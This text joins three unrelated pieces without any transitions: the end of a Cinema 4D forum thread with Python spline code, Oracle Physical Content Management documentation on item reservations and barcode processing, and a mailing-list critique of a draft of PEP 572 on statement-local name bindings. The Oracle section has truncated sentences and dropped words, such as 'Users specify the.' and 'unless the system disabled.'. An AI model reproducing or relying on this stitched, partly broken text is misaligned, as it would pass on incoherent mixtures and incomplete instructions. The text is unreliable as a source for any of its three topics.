I´ll be back with more time.
Thx and greetings
rownn
@rownn: I've fixed the naming convention in the previous post to make it more clear.
Hi,
I´ve fixed it in another way. It isn´t very interesting how, because it is pretty case specific.
I wasn´t able to use the informations above to get it to work, because I wasnt able to get the "customlength" by offset.
But to clarify what I wandet to do here a screenshot:
But thx again
rownn
Hi rownn, thanks for following up.
Can you elaborate more on I wasnt able to get the "customlength" by offset.?
Actually looking at your screenshot and assuming that the red-labelled refers to what you actually consider "wrong" and the green-labelled to the right, I think that the red-labelled is indeed correct since it actually lies in the middle of spline considering that the start point is the top/right vertex.
At the same time, the green-labelled point is the one that you can obtain when passing 0.5 to SplineHelp::GetPosition() which is the 50% of the spline parametrization not of the spline length.
Assuming a linear rectangle is used as shown above the code below shows the behavior I describe:
def main():
sh = c4d.utils.SplineHelp()
sh.InitSpline(op)
splineLength = sh.GetSplineLength()
halfLength = splineLength / 2
midPointOffsetIncorrect = halfLength / splineLength
midPointOffsetFromReal = sh.GetOffsetFromReal(midPointOffsetIncorrect,0)
midPointOffsetFromUnit = sh.GetOffsetFromUnit(halfLength,0)
mtx = c4d.Matrix()
midpointRed = sh.GetPosition(midPointOffsetFromUnit) # which in this case is the same of offsetFromReal
midNullRed = c4d.BaseObject(c4d.Onull)
midNullRed[c4d.ID_BASEOBJECT_USECOLOR] = 2
midNullRed[c4d.ID_BASEOBJECT_COLOR] = c4d.Vector(1,0,0)
midNullRed[c4d.ID_BASELIST_NAME] = "MidRed"
mtx.off = midpointRed
midNullRed.SetMg(mtx)
midpointGreen = sh.GetPosition(midPointOffsetIncorrect)
midNullGreen = c4d.BaseObject(c4d.Onull)
midNullGreen[c4d.ID_BASEOBJECT_USECOLOR] = 2
midNullGreen[c4d.ID_BASEOBJECT_COLOR] = c4d.Vector(0,1,0)
midNullGreen[c4d.ID_BASELIST_NAME] = "MidGreen"
mtx.off = midpointGreen
midNullGreen.SetMg(mtx)
doc.InsertObject(midNullRed)
doc.InsertObject(midNullGreen)
c4d.EventAdd()
Best, Riccardo | https://plugincafe.maxon.net/topic/11281/spline-notrealoffset-to-realoffset/1 | CC-MAIN-2022-05 | refinedweb | 629 | 52.36 |
Physical Content Management offers circulation services for physical content items, in much the same way as a library circulates content. Users can receive items, keep them for a specific period then return them so they can be stored at their designated location again for someone else to check out. Users can also put a hold on unavailable items. If more than one person makes a reservation request for an item a waiting list, which specifies the order in which people made a reservation for the item. Barcode functionality is used in conjunction with reservations to easily track items which are either checked out or requested.
This chapter covers the following topics:
"The Reservation Process"
The following tasks are typically performed when using reservations. These tasks can be performed by users depending on how the system has been set up. Therefore, these tasks are all discussed in the Oracle Fusion Middleware User's Guide for Universal Records Management:
Creating a reservation request
Editing a reservation request
Deleting a reservation request
Searching for reservations
Saving reservation search results
Viewing reservations for physical items
Viewing your own reservation requests
Editing a request item
Canceling a request item
Deleting a request item
Changing the status of a request item
Reservations in Physical Content Management are handled using a special criteria workflow called "ReservationProcess," which is used for approval and notification purposes. This workflow must be configured and enabled. See the Oracle Fusion Middleware Setup Guide for Universal Records Management for details about setting up that work.
The reservation workflow is not used if the "Check in internal content item for reservation workflow" setting on the Configure Physical Content Management Page is disabled. Users can still make reservations but e-mail notifications are not received (not even by the system administrator). If this is done, a different procedure to process reservations should be in place.
Users with the predefined PCM Requestor role can make reservations for physical items. Users with the predefined 'pcmadmin' role can also edit and process reservation request.
By default, if a user submits a reservation request for one or more items, a new content item is checked into the repository in the Reservation security group. If the workflow is enabled, this content item automatically enters the ReservationProcess workflow and the administrator receives a workflow review notification about the request.
Default metadata values can be set to be assigned to the reservation workflow item checked into the repository. See the Oracle Fusion Middleware Setup Guide for Universal Records Management for details.
The person in the administrator role receives e-mail notifications about pending reservations and the requesting user is not notified. Change this behavior by changing the ReservationGroup alias in the User Admin utility. For example, you could set up the workflow to also send e-mail notifications to the user who made the reservation request.
Clicking the Review workflow item link in the notification e-mail opens the Workflow Review for Request page, where the administrator can acknowledge the reservation request. As soon as the administrator clicks the Approve button on this page, the reservation request exits the workflow.
The administrator can then proceed and fulfill the reservation request in accordance with the applicable procedures within the organization.
The reservation process can be modified to suit an organization's need by changing the ReservationProcess workflow. For more information about workflows, see the Oracle Fusion Middleware Application Administrator's Guide for Content Server.
All completed reservation requests are automatically logged in the reservations history. A reservation request is considered completed if none of its request items are still pending (in process), on a waiting list, or checked out.
By default, completed reservation requests are stored in the history log until it is deleted. A log is kept in the audit history table until it is archived.
Limit the maximum number of days a completed request is included in the history by modifying settings on the Configure Physical Content Management Page.
An administrator can view the current reservations history by searching for reservations with the Completed field set to 'Yes'.
The following is a typical fulfillment process of a reservation request:
A user creates a reservation request for one or more physical items.
As soon as the user submits the reservation request, the status of each requested item is automatically set to "In Process." If it was already "In Process" or "Checked Out," it is set to "Waiting List." See "Request Status", "Transfer Method" and "Priority" for information about data used in reservation requests.
A reservation workflow is initiated and the administrator receives an e-mail notification to review the reservation request.
The administrator acknowledges the reservation request. If any items in the reservation request are not available or should be denied, the administrator can change their status accordingly.
All available requested items (not already checked out) are gathered from their storage location, in accordance with the organization's procedures. During this process, an appropriate transaction barcode is scanned to indicate it is checked out, the requestor's barcode is scanned, and the barcode for the desired item is scanned.
The status of each available requested item is changed to "Checked Out" automatically after the barcode file is uploaded to PCM and the data is synchronized.
When the item's status changes to "Checked Out," its current location (as shown on the Physical Item Information Page) is automatically set to the deliver-to location specified when the reservation request was created. If no deliver-to location was specified, the current location is set to "OTHER." The current location comment on the Physical Item Information Page is set to the location comment specified for the associated reservation request. If no comment was provided, it is set to the login name of the user who made the reservation.
The requesting user can be notified and the reservation fulfilled in accordance with the applicable procedures within the organization. This is not handled by PCM but by the organization.
The user keeps the items for a specific number of days. If a bar code system is in place, after the item is returned, the item's barcode is once again scanned, the barcode for the location of the item's placement is scanned, and a transaction barcode is scanned to indicate the item is checked in and its location.
The status is changed to "Returned" and its current location set to its assigned storage location automatically after the barcode file is uploaded to PCM.
If a waiting list exists for the item, the status for the next requestor on the list should be changed from "Waiting List" to "In Process," so the item can be processed for the user. This can be done manually on any of the reservation pages, but if a barcode scanner is used to scan the item for check-in, it can be done automatically, depending on how the system is configured.
The status of the item continues to be "Returned" until the reservation is deleted. This can be done manually or automatically (after a certain number of days).
Depending on the procedures in place at the site, a charge may be levied for reservations and processing. Chargebacks and billing are discussed in the Oracle Fusion Middleware User's Guide for Universal Records Management.
Each reservation request has several properties, including the following:
The request status specifies the current status for a reserved physical item, which can be any of the following:
Waiting List: The request item is currently already checked out to someone else. It will become available to the next requestor upon its return (unless the system disabled.
Returned: The checked-out item was returned to the storage repository, so it is available for other users to reserve and check out.
A reservation request is considered completed if none of its request items are still pending (in process), on a waiting list, or checked out (including overdue).
The PCM.Reservation.Process right is required to change the status of a reservation request item. By default, this right is assigned to the predefined 'pcmadmin' role.
The transfer method specifies how the person who made the request (the requestor) will receive the reserved item. Users specify the.
E-mail: The content item will be e-mailed to its intended recipient.
The default transfer method is set on the Configure Physical Content Management Page.
The priority of a reservation request specifies the urgency with which it needs to be fulfilled. User specify the default priority is set on the Configure Physical Content Management Page.
If you are an administrator, you can perform actions on a request item to change its status as part of the reservation fulfillment process. These actions are accessible through the Action menu for a request item on the Reservation Search Results Page or the Items for Request page. You can also perform the actions on multiple items simultaneously using the Actions menu on the Items for Request page.
Not all actions may be available for a particular request item, depending on the item's current status. For example, if the item is currently checked out, it can only be deleted or returned.
The following actions are supported:
Delete: Deletes an item from a reservation request. If deleted, the request for that item is not included in the reservation log. The item is no longer in the item list for the reservation request. This option is available only if the system has been set up to allow users to delete items from a reservation request. In addition, requested items can be deleted only by a user with the PCM.Reservation.Delete right (assigned to the predefined PCM Administrator role by default).
Deny: Rejects the reservation request for an item. The item will remain to be part of the reservation request, but it will not provided to the requestor.
Not Found: Changes the status of an item because it could not be located in its designated location. The item will remain to be part of the reservation request, but it cannot currently be provided to the requestor.
Unavailable: Changes the status of an item because it cannot currently be processed for delivery. The item will remain to be part of the reservation request, but it cannot currently be provided to the requestor.
Cancel: Cancels the reservation request for an item before it is fulfilled. If a request item is canceled, the request for that item is still included in the reservation log (the item is still on the item list for the reservation, with its status set to "canceled"). Request items can be canceled only users with the PCM.Reservation.Edit right (assigned to the predefined 'pcmadmin' role by default). Only request item with the "In Process" status can be canceled.
Check Out: Changes the status of an item because it was handed off to its intended recipient, who can now keep the item for the configured checkout period. After checking out a request item,.
Returned: Changes the status of a checked-out item because it was returned handed off to its intended recipient, who can now keep the item for an agreed period.
Barcode files are generated by barcode devices which scan storage information contained in barcodes located on physical content items or storage containers. A barcode is a machine-readable symbol used to store bits of data. In the context of physical content management, they can be used for purposes of identification, inventory, tracking, and reservation fulfillment.
Barcodes can be printed on labels attached to physical content items or storage containers holding such items (for example, a box). This helps track their location and status. User labels can also be created which help process reservation requests by users.
Important:View barcode reports using HTML but print reports using PDF in order to ensure proper formatting.
The following technical information applies to barcodes in PCM:
Physical Content Management uses the Code 3 of 9 barcoding standard (also called Code 39). This is a widely used standard for alphanumeric barcodes that can store upper-case characters, decimal numbers, and some punctuation characters (dash, period, dollar sign, slash, percent sign, and plus symbol).
All lower-case letters are automatically converted to upper case. For example, if a user login is 'jsmith' then its barcode value is 'JSMITH'.
Any accented letters and double-byte characters (such as Japanese and Korean) are encoded in their hexadecimal values. For example, if a user login is 'kmüller', then its barcode value is 'KMC39CLLER' (Ü = hex C39C). Therefore the barcode length increases as multiple hexadecimal characters are used to represent each accented letter or double-byte character.
Barcode values for users default to their login names. This behavior can be changed for a user by setting a specific, unique barcode value for the user in the User Admin utility.
After scanning barcode information using a barcode reader, load the information into Physical Content Management. This can save time and money, and is especially useful to process large numbers of items (for example, during the initial Physical Content Management implementation).
There are two ways to load barcode information into Physical Content Management:
Directly using the PCM Barcode Utility software.
Manually by processing generated barcode files (see "Processing a Barcode File".)
Barcode files are generated by barcode scanners which read storage information from barcode labels and write this information to a file. Use the optional PCM Barcode Utility to directly load barcode information into the system or the barcode file can be processed manually.
Barcode files are plain-text files that are viewable using any text editor. Figure 7-2 shows an example of a barcode file.
Important:Barcode files are created by barcode scanners and processed by Physical Content Management, and there is normally no reason to view or modify barcode files.
When a barcode file is processed (automatically or manually), one of three actions are performed (specified for each item in the barcode file):
The Check In barcode action assigns an item to the location specified in the barcode file for the item. It is only the current location that is set, not the permanent location. Both the location and the item must already exist in Physical Content Management. If either does not exist, an error is reported.
[The location must already exist in the defined storage space hierarchy in Physical Content Management. If an item to be checked in does not yet exist in Physical Content Management, it is created and assigned to the specified location. If the item already exists, its current location is updated to match the value in the barcode file.]
The Check Out barcode action checks an item out to the user specified in the barcode file for the item (typically obtained by scanning a user label). The status for the item is set to "Checked Out" and its checkout user to the specified user (both values are shown on the Physical Item Information page). The item's current location is automatically set to the value of the Deliver To Location field for the associated reservation request (if there is one). If no value was entered in that field or if no reservation request exists, the current location is set to "OTHER," and the Location Comment field will show the name of the checkout user.
The Set Location barcode action assigns an item to the current and permanent locations specified in the barcode file for that item, allowing it to be moved to a different location. Both the locations and the item must already exist in Physical Content Management. If any of them do not exist, an error is reported.
The locations and items must already exist in the defined storage space hierarchy in Physical Content Management. The item's current and permanent locations are updated to match the values in the barcode file.
The Barcode Utility software is a Windows application providing an interface to the Videx LaserLite barcode scanner used with Physical Content Management. With this functionality, information can be read into the barcode scanner and uploaded into PCM. The barcode information can also be read and written to a file for manual processing at a later time. In addition, the Barcode Utility enables the reprogramming of the barcode scanner, should that be necessary.
The Barcode Utility software for Videx is provided but not automatically installed with the PCM software. To use, install the software after enabling PCM. The installer for the Barcode Utility is included on the PCM software distribution media.
Microsoft .NET Framework Version 1.1 Redistributable Package is needed to run the Barcode Utility. If not already on the computer, it can be downloaded from the Microsoft website at
The Barcode Utility can be installed on any computer that has a web connection to the server.
Important:If you upgrade the Barcode Utility from an earlier version, you must uninstall the existing instance before installing the new release. If you do not, an error message is reported during the installation and you will not be able to proceed.
To install the Barcode Utility, complete the following steps:
Locate the executable installer file, named BarcodeUtility.exe on the Physical Content Management distribution media. This is typically stored in the ucm\Distribution\urm\language directory (different files are included for the different languages that are supported).
Double-click the setup.exe file to continue the installation.
Follow the instructions on screen to install the software.
From Start, select Programs, then select Oracle, then select Barcode Utility, then select Barcode Utility. You can also double-click the utility icon on the Windows desktop.
An interface is also provided to a Wedge Reader type of scanner which plugs in directly to the computer. If that type of scanner is enabled, data is automatically uploaded to a location on the screen where the cursor rests after three scans have taken place.
This section discusses the following common barcode tasks:
"Programming the Barcode Scanner"
"Uploading Barcode Data Directly to PCM"
"Saving Barcode Data to a File"
"Uploading Previously Saved Barcode Data to PCM"
"Processing a Barcode File"
For details about enabling a mobile bar code scanner, see the Oracle Fusion Middleware Setup Guide for Universal Records Management.
The Videx Wand scanner may be pre-programmed for use at installation. Use the following procedure, if needed, to program the barcode scanner:
Start the Barcode Utility application.
The Main Barcode Utility Screen is displayed.
Click Options then Program Videx Wand.
The Program Videx Barcode Wand Screen is displayed.
Choose the type of scanner to be programmed from the Communication Device list.
Choose the communication port where the device is connected.
Click Program.
A message appears, indicating that the application is communicating with the scanner. The dialog closes when the programming finishes.
Click Done on the Main Barcode Utility Screen.
Push the Scan button on the scanner.
After gathering data with the scanner, the data can be directly uploaded to the server running the PCM software. The data can also be saved to a file and uploaded later.
Complete the following steps to upload the scanned barcode data directly to PCM: that the Download To File Only and Allow File Selection boxes are both cleared.
Click the Process button.
A prompt appears to begin the upload process.
Select Yes to continue.
Select the host name of the instance where data files will be uploaded. The software must be installed on this computer. OK after selecting the user name.
The data is now transferred from the scanner to the PCM system. After all data has been transferred, a message is displayed, indicating the operation is complete.
Click OK to continue.
Important:If you select No when asked to confirm the upload, the data is erased from the barcode scanner and nothing is uploaded. The data is still available in a file called DATA.TXT (located in the installation directory of the Barcode Utility), but this file is overwritten the next time data is uploaded or saved to a file.
Complete the following steps to save the scanned barcode data to a file: the Download To File Only box is selected.
Click the Process button.
The data is stored in a file called DATA.TXT, which is located in the installation directory of the Barcode Utility. See "Uploading Previously Saved Barcode Data to PCM" for details about uploading this data file at a later time.
Note:Data is always stored in a file named DATA.TXT. If not renamed, the file is overwritten the next time data is downloaded and stored as a file.
If barcode data was saved to a file for later processing (see "Saving Barcode Data to a File"), use the Barcode Utility application to move the data to the PCM software for use.
Complete the following steps to upload a previously saved barcode data file:
Start the Barcode Utility application.
The Main Barcode Utility Screen is displayed.
Make sure the Allow File Selection box is selected and click the Process button.
A file selection dialog is displayed, showing the contents of the Barcode Utility installation directory (which is the default location of saved barcode data files).
Select the file to be uploaded, or navigate to the directory where the data files were stored and select a file from that location. Click Open.
The Barcode Upload Screen is displayed.
Select the host name of the instance where the data file will be uploaded. The software must be installed on this computer.
If you need Submit.
The barcode data file is processed and uploaded to the selected instance.
After the file upload has completed, a message is displayed. Click OK.
The Barcode Upload Results Screen is displayed, allowing a review of the results of the upload.
Click Done when finished.
Permissions:The PCM.Barcode.Process right is required to perform this action. This right is assigned by default to the PCM Administrator role.
Use this procedure to process a barcode file containing information obtained using a barcode scanner.
Click Physical then Process Barcode File from the Top menu.
The Barcode Processing Page is displayed.
Click the Browse button to select a barcode file to be processed.
A file selection dialog is opened.
Navigate to the barcode file to be processed, select it, and close the file selection dialog.
Click Process File.
The barcode file is processed, and the Barcode File Processed Page is displayed. If any errors occurred, these are reported in the Message column. Click the Info icon to see more specific information about the error message.
When finished viewing the results of the barcode processing, click OK to return to the Barcode Processing Page. | http://docs.oracle.com/cd/E14571_01/doc.1111/e10789/c07_reservations.htm | CC-MAIN-2015-22 | refinedweb | 3,759 | 54.32 |
repackage 0.5
Repackaging, call a non-registered package in any directory (with relative call). Used either by modules moved into to a subdirectory or to prepare the import of a non-registered package (in any relative path).
Laurent Franceschetti March/June 2013 - 2017 MIT License.
Purpose
This module allows any Python program to call a non-registered package in a reliable way. With this module, you may call “non-official” repositories, including with relative paths.
CAUTION: This form is an alternative to system of relative paths for python imports ([PEP 328]()) and as such it is largely redundant. It can, however, be interesting because it shows how such a problem could be solved.
Install
If you are using pip:
pip install repackage
The problem
In Python, registered packages are called by name in import instructions, and lower directories may be treated for all purposes as packages.
Two practical problems arise: a) How to easily call unregistered packages which have been dumped in an adjacent directory? b) How to easily move python files into a sub-directory without messing up the import statements?
There are complicated issues with relative imports (see PEP366). The basic idea here is to add the source directory of the package to the lib path (thanks to a call to sys.path.append).
But the probem, is how to programmatically find the source directory, from a relative path?
Two often advocated methods to determine the path are: a. from current directory or b. from __FILE__ .
- Both those methods have a flaw:
- The first does not take into account the file where the import is made, hence will fail if the project is using more than one directory.
- The second does not allow to delegate those operations to a module that would handle those issues (as __FILE__ is going to point now to point to the module and not the caller).
The solution
This package uses a simple strategy that is likely to work in a good range of cases: it inspects the stack to determine which file is the caller and works out the relative path from there. The only delicate part consisted in working out how many steps down the stack this is, but the answer should be invariant and can be computed both by reasoning and by trial and error (in this case: 3).
Usage
Situation 1) Moving the files into a lower directory. From the module you want to make the call, just use the following statement before the imports:
import repackage repackage.up()
It should work without changing the imports that were previously pointing to the upper directory.
If it’s two directories up, write:
import repackage repackage.up(2)
Situation 2) Calling a non-registered directory somewhere else (absolute or relative path):
import repackage repackage.add("../../otherdir")
Clearly, repackage.up() would be equivalent to repackage.add(“..”) . I prefer the first because it is more terse and syntactically more robust.
Limitations
If at some points in the execution, you attempt to add several times the same directory to the lib path, this should remain without effect (this is a feature of sys.path.append).
This module has worked reliably for a while, so it is a beta version. The method seems robust so far, but not all ins and outs have been explored. One precaution might be to ensure that the repackaging always points to the same source directory of a package (not to subdirectories of the same package), so as to avoid possible ambiguities in the lib path. (If this really turned out to be a problem, this could be checked on the fly and a warning issued?).
If you find bugs, or even find this approach useless, essentially flawed or against the Zen of Python, I will be glad to hear about it. Similarly, if you liked it or have ideas on how to improve it, let me know.
- Author: Laurent Franceschetti
- Keywords: package relative path module import library
- License: MIT
- Categories
- Package Index Owner: galileo
- DOAP record: repackage-0.5.xml | https://pypi.python.org/pypi/repackage | CC-MAIN-2017-39 | refinedweb | 672 | 61.16 |
On Sat, Mar 24, 2018 at 2:00 AM, Steven D'Aprano steve@pearwood.info wrote:
On Fri, Mar 23, 2018 at 09:01:01PM +1100, Chris Angelico wrote:
PEP: 572 Title: Syntax for Statement-Local Name Bindings
[...]
Abstract
Programming is all about reusing code rather than duplicating it.
I don't think that editorial comment belongs here, or at least, it is way too strong. I'm pretty sure that programming is not ALL about reusing code, and code duplication is not always wrong.
Rather, we can say that *often* we want to avoid code duplication, and this proposal is way way to do so. And this should go into the Rationale, not the Abstract. The abstract should describe what this proposal *does*, not why, for example:
This is a proposal for permitting temporary name bindings which are limited to a single statement.
What the proposal *is* goes in the Abstract; reasons *why* we want it go in the Rationale.
Thanks. I've never really been happy with my "Abstract" / "Rationale" split, as they're two sections both designed to give that initial 'sell', and I'm clearly not good at writing the distinction :)
Unless you object, I'm just going to steal your Abstract wholesale. Seems like some good words there.
I see you haven't mentioned anything about Nick Coglan's (long ago) concept of a "where" block. If memory serves, it would be something like:
value = x**2 + 2*x where: x = some expression
These are not necessarily competing, but they are relevant.
Definitely relevant, thanks. This is exactly what I'm looking for - related proposals that got lost in the lengthy threads on the subject. I'll mention it as another proposal, but if anyone has an actual post for me to reference, that would be appreciated (just to make sure I'm correctly representing it).
Nor have you done a review of any other languages, to see what similar features they already offer. Not even the C's form of "assignment as an expression" -- you should refer to that, and explain why this would not similarly be a bug magnet.
No, I haven't yet. Sounds like a new section is needed. Thing is, there's a HUGE family of C-like and C-inspired languages that allow assignment expressions, and for the rest, I don't have any personal experience. So I need input from people: what languages do you know of that have small-scope name bindings like this?
Rationale
When a subexpression is used multiple times in a list comprehension,
I think that list comps are merely a single concrete example of a more general concept that we sometimes want or need to apply the DRY principle to a single expression.
This is (usually) a violation of DRY whether it is inside or outside of a list comp:
result = (func(x), func(x)+1, func(x)*2)
True, but outside of comprehensions, the most obvious response is "just add another assignment statement". You can't do that in a list comp (or equivalently in a genexp or dict comp). Syntactically you're right that they're just one example of a general concept; but they're one of the original motivating reasons. I've tweaked the rationale wording some; the idea is now "here's a general idea" followed by two paragraphs of specific use-cases (comprehensions and loops). Let me know if that works better.
Syntax and semantics
In any context where arbitrary Python expressions can be used, a **named expression** can appear. This must be parenthesized for clarity, and is of the form ``(expr as NAME)`` where ``expr`` is any valid Python expression, and ``NAME`` is a simple name.
The value of such a named expression is the same as the incorporated expression, with the additional side-effect that NAME is bound to that value for the remainder of the current statement.
Examples should go with the description. Such as:
x = None if (spam().ham as eggs) is None else eggs
Not sure what you gain out of that :) Maybe a different first expression would help.
y = ((spam() as eggs), (eggs.method() as cheese), cheese[eggs])
Sure. I may need to get some simpler examples to kick things off though. is the same as nested functions (including comprehensions, since they're implemented with functions); and if SLNBs are *not* to shadow each other, the only way is to straight-up disallow it. For the moment, I'm not forbidding it, as there's no particular advantage to popping a SyntaxError.
Assignment to statement-local names is ONLY through this syntax. Regular assignment to the same name will remove the statement-local name and affect the name in the surrounding scope (function, class, or module).
That seems unnecessary. Since the scope only applies to a single statement, not a block, there can be no other assignment to that name.
Correction: I see further in that this isn't the case. But that's deeply confusing, to have the same name refer to two (or more!) scopes in the same block. I think that's going to lead to some really confusing scoping problems.
For the current proposal, I prefer simpler definitions to outlawing the odd options. The rule is: An SLNB exists from the moment it's created to the end of that statement. Very simple, very straight-forward. Yes, that means you could use the same name earlier in the statement, but ideally, you just wouldn't do that.
Python already has weirder behaviour in it.
def f():
... e = 2.71828 ... try: ... 1/0 ... except Exception as e: ... print(e) ... print(e) ...
f()
division by zero Traceback (most recent call last): File "<stdin>", line 1, in <module> File "<stdin>", line 7, in f UnboundLocalError: local variable 'e' referenced before assignment
Does this often cause problems? No, because most functions don't use the same name in two different ways. An SLNB should be basically the same.
Statement-local names never appear in locals() or globals(), and cannot be closed over by nested functions.
Why can they not be used in closures? I expect that's going to cause a lot of frustration.
Conceptually, the variable stops existing at the end of that statement. It makes for some oddities, but fewer oddities than every other variant that I toyed with. For example, does this create one single temporary or many different temporaries?
def f(): x = "outer" funcs = {} for i in range(10): if (g(i) as x) > 0: def closure(): return x funcs[x] = closure
Obviously the 'x' in funcs[x] is the current version of x as it runs through the loop. But what about the one closed over? If regular assignment is used ("x = g(i)"), the last value of x will be seen by every function. With a statement-local variable, should it be a single temporary all through the loop, or should each iteration create a brand new "slot" that gets closed over? If the latter, why is it different from regular assignment, and how would it be implemented anyway? Do we now need an infinite number of closure cells that all have the exact same name?
Execution order and its consequences
Since the statement-local name binding lasts from its point of execution to the end of the current statement, this can potentially cause confusion when the actual order of execution does not match the programmer's expectations. Some examples::
# A simple statement ends at the newline or semicolon. a = (1 as y) print(y) # NameError
That error surprises me. Every other use of "as" binds to the current local namespace. (Or global, if you use the global declaration first.)
I think there's going to be a lot of confusion about which uses of "as" bind to a new local and which don't.
That's the exact point of "statement-local" though.
I think this proposal is conflating two unrelated concepts:
-
introducing new variables in order to meet DRY requirements;
-
introducing a new scope.
Why can't we do the first without the second?
a = (1 as y) print(y) # prints 1, as other uses of "as" would do
That would avoid the unnecessary (IMO) restriction that these variables cannot be used in closures.
You're talking about one of the alternate proposals there. (#6, currently.) I have talked about the possibility of splitting this into two separate proposals, but then I'd have to try to chair two separate concurrent discussions that would constantly interact and cross over :)
# The assignment ignores the SLNB - this adds one to 'a' a = (a + 1 as a)
"SLNB"? Undefined acronym. What is it? I presume it has something to do with the single-statement variable.
Statement-Local Name Binding, from the title of the PEP. (But people probably don't read titles.)
I know it would be legal, but why would you write something like that? Surely your examples must at least have a pretence of being useful (even if the examples are only toy examples rather than realistic).
That section is about the edge cases, and one such edge case is assigning through an SLNB.
I think that having "a" be both local and single-statement in the same expression is an awful idea. Lua has the (mis-)features that variables are global by default, locals need to be declared, and the same variable name can refer to both local and global simultaneously. Thus we have:
print(x) # prints the global x local x = x + 1 # sets local x to the global x plus 1 print(x) # prints the local x
IMO that's a *good* thing. JavaScript works the other way; either you say "var x = x + 1;" and the variable exists for the whole function, pre-initialized to the special value 'undefined', or you say "let x = x + 1;" and the variable is in limbo until you hit that statement, causing a ReferenceError (JS's version of NameError). Neither makes as much sense as evaluating the initializer before the variable starts to exist.
That said, though, this is STILL an edge case. It's giving a somewhat-sane meaning to something you normally won't do.
This idea of local + single-statement names in the same expression strikes me as similar. Having that same sort of thing happening within a single statement gives me a headache:
spam = (spam, ((spam + spam as spam) + spam as spam), spam)
Explain that, if you will.
Sure. First, eliminate all the name bindings:
spam = (spam, ((spam + spam) + spam), spam)
Okay. Now anyone with basic understanding of algebra can figure out the execution order. Then every time you have a construct with an 'as', you change the value of 'spam' from that point on.
Which means we have:
spam0 = (spam0, ((spam0 + spam0 as spam1) + spam1 as spam2), spam2)
Execution order is strictly left-to-right here, so it's pretty straight-forward. Less clear if you have an if/else expression (since they're executed middle-out instead of left-to-right), but SLNBs are just like any other side effects in an expression, performed in a well-defined order. And just like with side effects, you don't want to have complex interactions between them, but there's nothing illegal in it.
# Compound statements usually enclose everything... if (re.match(...) as m): print(m.groups(0)) print(m) # NameError
Ah, how surprising -- given the tone of this PEP, I honestly thought that it only applied to a single statement, not compound statements.
You should mention this much earlier.
Hmm. It's right up in the Rationale section, but without an example. Maybe an example would make it clearer?
# ... except when function bodies are involved... if (input("> ") as cmd): def run_cmd(): print("Running command", cmd) # NameError
Such a special case is a violation of the Principle of Least Surprise.
Blame classes, which already do this. Exactly this. Being able to close over temporaries creates its own problems.
# ... but function *headers* are executed immediately if (input("> ") as cmd): def run_cmd(cmd=cmd): # Capture the value in the default arg print("Running command", cmd) # Works
Function bodies, in this respect, behave the same way they do in class scope; assigned names are not closed over by method definitions. Defining a function inside a loop already has potentially-confusing consequences, and SLNBs do not materially worsen the existing situation.
Except by adding more complications to make it even harder to understand the scoping rules.
Except that I'm adding no complications. This is just the consequences of Python's *existing* scoping rules.
Differences from regular assignment statements
Using ``(EXPR as NAME)`` is similar to ``NAME = EXPR``, but has a number of important distinctions.
- Assignment is a statement; an SLNB is an expression whose value is the same as the object bound to the new name.
- SLNBs disappear at the end of their enclosing statement, at which point the name again refers to whatever it previously would have. SLNBs can thus shadow other names without conflict (although deliberately doing so will often be a sign of bad code).
Why choose this design over binding to a local variable? What benefit is there to using yet another scope?
Mainly, I just know that there has been a lot of backlash against a generic "assignment as expression" syntax in the past.
- SLNBs do not appear in ``locals()`` or ``globals()``.
That is like non-locals, so I suppose that's not unprecedented.
Will there be a function slnbs() to retrieve these?
Not in the current proposal, no. Originally, I planned for them to appear in locals() while they were in scope, but that created its own problems; I'd be happy to return to that proposal if it were worthwhile.
- An SLNB cannot be the target of any form of assignment, including augmented. Attempting to do so will remove the SLNB and assign to the fully-scoped name.
What's the justification for this limitation?
Not having that limitation creates worse problems, like that having "(1 as a)" somewhere can suddenly make an assignment fail. This is particularly notable with loop headers rather than simple statements.
Example usage
These list comprehensions are all approximately equivalent::
[...]
I don't think you need to give an exhaustive list of every way to write a list comp. List comps are only a single use-case for this feature.
# See, for instance, Lib/pydoc.py if (re.search(pat, text) as match): print("Found:", match.group(0))
I do not believe that is actually code found in Lib/pydoc.py, since that will be a syntax error. What are you trying to say here?
Lib/pydoc.py has a more complicated version of the exact same functionality. This would be a simplification of a common idiom that can be found in the stdlib and elsewhere.
while (sock.read() as data): print("Received data:", data)
Looking at that example, I wonder why we need to include the parens when there is no ambiguity.
# okay while sock.read() as data: print("Received data:", data)
# needs parentheses while (spam.method() as eggs) is None or eggs.count() < 100: print("something")
I agree, but starting with them mandatory allows for future relaxation of requirements. The changes to the grammar are less intrusive if the parens are always required (for instance, the special case "f(x for x in y)" has its own entry in the grammar).
Performance costs
The cost of SLNBs must be kept to a minimum, particularly when they are not used; the normal case MUST NOT be measurably penalized.
What is the "normal case"?
The case where you're not using any SLNBs.
It takes time, even if only a nanosecond, to bind a value to a name, as opposed to *not* binding it to a name.
x = (spam as eggs)
has to be more expensive than
x = spam
because the first performs two name bindings rather than one. So "MUST NOT" already implies this proposal *must* be rejected. Perhaps you mean that there SHOULD NOT be a SIGNIFICANT performance penalty.
The mere fact that this feature exists in the language MUST NOT measurably impact Python run-time performance.
SLNBs are expected to be uncommon,
On what basis do you expect this?
Me, I'm cynical about my fellow coders, because I've worked with them and read their code *wink* and I expect they'll use this everywhere "just in case" and "to avoid namespace pollution".
Compared to regular name bindings? Just look at the number of ways to assign that are NOT statement-local, and then add in the fact that SLNBs aren't going to be effective for anything that you need to mutate more than once, and I fully expect that regular name bindings will far exceed SLNBs.
Besides, I think that the while loop example is a really nice one. I'd use that, I think. I *almost* think that it alone justifies the exercise.
Hmm, okay. I'll work on rewording that section later.
Forbidden special cases
In two situations, the use of SLNBs makes no sense, and could be confusing due to the ``as`` keyword already having a different meaning in the same context.
I'm pretty sure there are many more than just two situations where the use of this makes no sense. Many of your examples perform an unnecessary name binding that is then never used. I think that's going to encourage programmers to do the same, especially when they read this PEP and think your examples are "Best Practice".
Unnecessary, yes, but not downright problematic. The two specific cases mentioned are (a) evaluating expressions, and (b) using the 'as' keyword in a way that's incompatible with PEP 572. (There's no confusion in "import x as y", for instance, because "x" is not an expression.)
Besides, in principle they could be useful (at least in contrived examples). Emember that exceptions are not necessarily constants. They can be computed at runtime:
try: ... except (Errors[key], spam(Errors[key]): ...
Sure they *can*. Have you ever seen something like that in production? I've seen simple examples (eg having a tuple of exception types that you care about, and that tuple not always being constant), but nothing where you could ever want an SLNB.
Since we have a DRY-violation in Errors[key] twice, it is conceivable that we could write:
try: ... except ((Errors[key] as my_error), spam(my_error)): ...
Contrived? Sure. But I think it makes sense.
Perhaps a better argument is that it may be ambiguous with existing syntax, in which case the ambiguous cases should be banned.
